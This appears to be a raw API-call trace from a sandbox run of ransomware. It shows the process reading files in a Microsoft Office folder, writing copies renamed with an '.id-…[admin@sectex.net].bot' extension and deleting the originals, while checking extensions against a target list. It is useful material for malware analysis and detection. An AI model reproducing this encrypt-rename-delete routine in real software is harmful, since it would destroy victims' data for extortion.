	[0143.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.535] GetLastError () returned 0x0
	[0143.535] ReadFile (in: hFile=0x3b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x10f78, lpOverlapped=0x0) returned 1
	[0143.548] WriteFile (in: hFile=0x3cc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x10f80, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x10f80, lpOverlapped=0x0) returned 1
	[0143.550] ReadFile (in: hFile=0x3b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.550] WriteFile (in: hFile=0x3cc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0143.550] SetEndOfFile (hFile=0x3cc) returned 1
	[0143.550] CloseHandle (hObject=0x3cc) returned 1
	[0143.550] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.550] SetEndOfFile (hFile=0x3b4) returned 1
	[0143.553] CloseHandle (hObject=0x3b4) returned 1
	[0143.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\aec.vsl")) returned 1
	[0143.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.614] lstrlenW (lpString=".doc") returned 4
	[0143.614] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.614] lstrlenW (lpString=".docx") returned 5
	[0143.614] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0143.614] lstrlenW (lpString=".pdf") returned 4
	[0143.614] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.614] lstrlenW (lpString=".xls") returned 4
	[0143.614] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.614] lstrlenW (lpString=".xlsx") returned 5
	[0143.614] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0143.614] lstrlenW (lpString=".ppt") returned 4
	[0143.614] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.614] lstrlenW (lpString=".zip") returned 4
	[0143.614] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.614] lstrlenW (lpString=".rar") returned 4
	[0143.614] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.614] lstrlenW (lpString=".bz2") returned 4
	[0143.614] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString=".7z") returned 3
	[0143.615] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString=".dbf") returned 4
	[0143.615] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString=".1cd") returned 4
	[0143.615] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString=".jpg") returned 4
	[0143.615] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString=".doc") returned 4
	[0143.615] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString=".docx") returned 5
	[0143.615] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0143.615] lstrlenW (lpString=".pdf") returned 4
	[0143.615] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString=".xls") returned 4
	[0143.615] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0143.615] lstrlenW (lpString=".xlsx") returned 5
	[0143.615] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0143.615] lstrlenW (lpString=".ppt") returned 4
	[0143.615] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.615] lstrlenW (lpString=".zip") returned 4
	[0143.615] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0143.615] lstrlenW (lpString=".rar") returned 4
	[0143.615] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString=".bz2") returned 4
	[0143.615] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0143.615] lstrlenW (lpString=".7z") returned 3
	[0143.615] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0143.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.616] lstrlenW (lpString=".dbf") returned 4
	[0143.616] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0143.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.616] lstrlenW (lpString=".1cd") returned 4
	[0143.616] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0143.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55
	[0143.616] lstrlenW (lpString=".jpg") returned 4
	[0143.616] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0143.616] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0143.616] lstrlenW (lpString="CALEVENT.VRD") returned 12
	[0143.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0143.671] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2144) returned 1
	[0143.671] CloseHandle (hObject=0x3b4) returned 1
	[0143.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd")) returned 0x20
	[0143.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.952] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.952] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.957] GetLastError () returned 0x0
	[0143.957] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x860, lpOverlapped=0x0) returned 1
	[0143.959] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x870, lpOverlapped=0x0) returned 1
	[0143.960] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.960] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.961] SetEndOfFile (hFile=0x31c) returned 1
	[0143.961] CloseHandle (hObject=0x31c) returned 1
	[0143.961] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.961] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.963] CloseHandle (hObject=0x3c0) returned 1
	[0143.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.963] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd")) returned 1
	[0143.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.964] lstrlenW (lpString=".doc") returned 4
	[0143.964] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0143.964] lstrlenW (lpString=".docx") returned 5
	[0143.964] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0143.964] lstrlenW (lpString=".pdf") returned 4
	[0143.964] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0143.964] lstrlenW (lpString=".xls") returned 4
	[0143.964] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0143.964] lstrlenW (lpString=".xlsx") returned 5
	[0143.964] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0143.964] lstrlenW (lpString=".ppt") returned 4
	[0143.964] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0143.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.964] lstrlenW (lpString=".zip") returned 4
	[0143.964] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0143.964] lstrlenW (lpString=".rar") returned 4
	[0143.964] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0143.964] lstrlenW (lpString=".bz2") returned 4
	[0143.964] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString=".7z") returned 3
	[0143.965] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString=".dbf") returned 4
	[0143.965] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString=".1cd") returned 4
	[0143.965] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString=".jpg") returned 4
	[0143.965] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString=".doc") returned 4
	[0143.965] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString=".docx") returned 5
	[0143.965] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0143.965] lstrlenW (lpString=".pdf") returned 4
	[0143.965] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString=".xls") returned 4
	[0143.965] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0143.965] lstrlenW (lpString=".xlsx") returned 5
	[0143.965] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0143.965] lstrlenW (lpString=".ppt") returned 4
	[0143.965] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.965] lstrlenW (lpString=".zip") returned 4
	[0143.965] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0143.965] lstrlenW (lpString=".rar") returned 4
	[0143.965] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0143.965] lstrlenW (lpString=".bz2") returned 4
	[0143.965] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0143.966] lstrlenW (lpString=".7z") returned 3
	[0143.966] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0143.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.966] lstrlenW (lpString=".dbf") returned 4
	[0143.966] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0143.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.966] lstrlenW (lpString=".1cd") returned 4
	[0143.966] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0143.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60
	[0143.966] lstrlenW (lpString=".jpg") returned 4
	[0143.966] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0143.966] lstrcmpiW (lpString1=".gta", lpString2=".bot") returned 1
	[0143.966] lstrlenW (lpString="Discussion14.gta") returned 16
	[0143.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.966] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=362441) returned 1
	[0143.966] CloseHandle (hObject=0x3c0) returned 1
	[0143.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta")) returned 0x20
	[0143.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0143.967] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.967] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.968] GetLastError () returned 0x0
	[0143.968] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x587c9, lpOverlapped=0x0) returned 1
	[0143.976] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x587d0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x587d0, lpOverlapped=0x0) returned 1
	[0143.983] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.983] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0143.983] SetEndOfFile (hFile=0x31c) returned 1
	[0143.983] CloseHandle (hObject=0x31c) returned 1
	[0143.983] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.983] SetEndOfFile (hFile=0x3c0) returned 1
	[0143.994] CloseHandle (hObject=0x3c0) returned 1
	[0143.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.995] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion14.gta")) returned 1
	[0144.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.292] lstrlenW (lpString=".doc") returned 4
	[0144.292] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0144.292] lstrlenW (lpString=".docx") returned 5
	[0144.292] lstrcmpiW (lpString1=".docx", lpString2="4.gta") returned -1
	[0144.292] lstrlenW (lpString=".pdf") returned 4
	[0144.292] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0144.292] lstrlenW (lpString=".xls") returned 4
	[0144.292] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0144.292] lstrlenW (lpString=".xlsx") returned 5
	[0144.292] lstrcmpiW (lpString1=".xlsx", lpString2="4.gta") returned -1
	[0144.292] lstrlenW (lpString=".ppt") returned 4
	[0144.292] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0144.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.292] lstrlenW (lpString=".zip") returned 4
	[0144.292] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0144.292] lstrlenW (lpString=".rar") returned 4
	[0144.292] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0144.292] lstrlenW (lpString=".bz2") returned 4
	[0144.292] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0144.292] lstrlenW (lpString=".7z") returned 3
	[0144.292] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0144.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString=".dbf") returned 4
	[0144.293] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString=".1cd") returned 4
	[0144.293] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString=".jpg") returned 4
	[0144.293] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString=".doc") returned 4
	[0144.293] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1
	[0144.293] lstrlenW (lpString=".docx") returned 5
	[0144.293] lstrcmpiW (lpString1=".docx", lpString2="4.gta") returned -1
	[0144.293] lstrlenW (lpString=".pdf") returned 4
	[0144.293] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString=".xls") returned 4
	[0144.293] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString=".xlsx") returned 5
	[0144.293] lstrcmpiW (lpString1=".xlsx", lpString2="4.gta") returned -1
	[0144.293] lstrlenW (lpString=".ppt") returned 4
	[0144.293] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.293] lstrlenW (lpString=".zip") returned 4
	[0144.293] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString=".rar") returned 4
	[0144.293] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1
	[0144.293] lstrlenW (lpString=".bz2") returned 4
	[0144.293] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1
	[0144.293] lstrlenW (lpString=".7z") returned 3
	[0144.293] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1
	[0144.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.294] lstrlenW (lpString=".dbf") returned 4
	[0144.294] lstrcmpiW (lpString1=".dbf", lpString2=".gta") returned -1
	[0144.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.294] lstrlenW (lpString=".1cd") returned 4
	[0144.294] lstrcmpiW (lpString1=".1cd", lpString2=".gta") returned -1
	[0144.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion14.gta") returned 64
	[0144.294] lstrlenW (lpString=".jpg") returned 4
	[0144.294] lstrcmpiW (lpString1=".jpg", lpString2=".gta") returned 1
	[0144.294] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.294] lstrlenW (lpString="EAWFINTL.DLL") returned 12
	[0144.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0144.332] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=51600) returned 1
	[0144.332] CloseHandle (hObject=0x398) returned 1
	[0144.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll")) returned 0x20
	[0144.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".doc") returned 4
	[0144.360] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString=".docx") returned 5
	[0144.360] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0144.360] lstrlenW (lpString=".pdf") returned 4
	[0144.360] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString=".xls") returned 4
	[0144.360] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString=".xlsx") returned 5
	[0144.360] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0144.360] lstrlenW (lpString=".ppt") returned 4
	[0144.360] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60
	[0144.360] lstrlenW (lpString=".zip") returned 4
	[0144.360] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString=".rar") returned 4
	[0144.360] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.360] lstrlenW (lpString=".bz2") returned 4
	[0144.360] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.360] lstrlenW (lpString=".7z") returned 3
